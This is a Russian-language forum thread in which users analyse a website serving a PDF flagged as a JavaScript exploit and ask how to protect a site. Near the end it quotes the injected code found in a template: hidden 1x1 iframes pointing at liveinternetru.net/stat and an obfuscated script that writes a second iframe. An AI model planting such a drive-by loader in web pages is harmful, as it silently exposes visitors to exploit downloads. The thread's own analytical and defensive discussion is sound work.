[okshef]

Результат проверки на Virustotal.com Файл открылся - ничего особенного - эмблема FireFox

[CyberDaemon]

Цитата okshef:

Файл открылся - ничего особенного »

А Exploit.PDF-JS.Gen не сработал?
Зачем сайт старательно пытается этот PDF втюхать?

[okshef]

А как он должен был сработать? Единственное, на что обратил внимание - задержка при открытии. Буду благодарен за пояснения, но в Гугл посылать не надо

P.S. Отправил на анализ в ESET

[akok]

AACC, а сайт куда дели?

To change this page, upload your website into the public_html directory

okshef, надеюсь на виртуалке открывал?

liveinternetru.net/stat - тут три скрипта загрузчика.

http://www.virustotal.com/ru/analisi...a25-1253623057

Кстати по одному и тому же IP скачивать не дает больше одного раза.

Все(включая раскладку по сайту) уплывает в еще несколько вирлабов.

[AACC]

Цитата akok:

AACC, а сайт куда дели? »

не хотел его рекламировать

Цитата:

по одному и тому же IP скачивать не дает больше одного раза.

верно, я тоже это заметил

оказывается код лежал перед </body> в файле main.tpl

Код:

<iframe src = "http://liveinternetru.net/stat/index.php" width=1 height=1 style="visibility:hidden">
<textarea id=GhLzcEK style="display:none">%3Ciframe src %3D %22http%3A%2F%2Fliveinternetru.net%2Fstat%2Findex.php%22 width%3D1 height%3D1 style%3D%22visibility%3Ahidden%22%3E</textarea><script>function KHCSXGjE(jEddBy){ fff=op.split("66");alert('FGpjimOxT'); } 
var BMKbDt=document;document['wr1ite'.replace(/[0-9]/,'')](unescape(document.getElementById('GhLzcEK').value));function VszbxFSJ(LWznyDzk){ fff.op.replace("v");var fApzn=new Function("QiZ", "return 912451;"); } 
</script>

вопрос, как можно такое засунуть? и как нужно от такого предохранять сайт?

[akok]

AACC, получив пароли от админа или хостера.